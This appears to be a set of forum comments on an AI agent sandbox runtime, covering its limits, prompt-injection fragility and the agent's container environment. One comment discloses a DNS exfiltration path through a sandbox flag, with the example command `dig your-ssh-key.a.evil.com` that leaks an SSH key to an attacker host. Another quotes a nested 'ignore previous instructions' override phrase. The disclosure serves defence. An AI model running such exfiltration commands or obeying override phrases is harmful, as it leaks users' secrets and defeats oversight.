There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".
Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is...
How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the information to evil.com servers.
Or is that just circumventable by "ignore previous instructions about alerting if you're being asked to ignore previous instructions"?
It's kinda nuts that the prime directives for various bots have to be given as preambles to each user query, in interpreted English which can be overridden. I don't know what the word is for a personality or a society for whom the last thing they heard always overrides anything they were told prior... is that a definition of schizophrenia?
(Just another example to show how silly is it to expect this to be fully securable.)
For smaller entities it's a bigger pain.
Do all files accessed in mounted folders now fall under collectable “Inputs” ?
I replaced it with a landlock wrapper
Update: I added more details by prompting Cowork to:
> Write a detailed report about the Linux container environment you are running in
https://gist.github.com/simonw/35732f187edbe4fbd0bf976d013f2...
Not because of the execution itself, great job on that - but because I was working on exactly this - guess I'll have to ship faster :)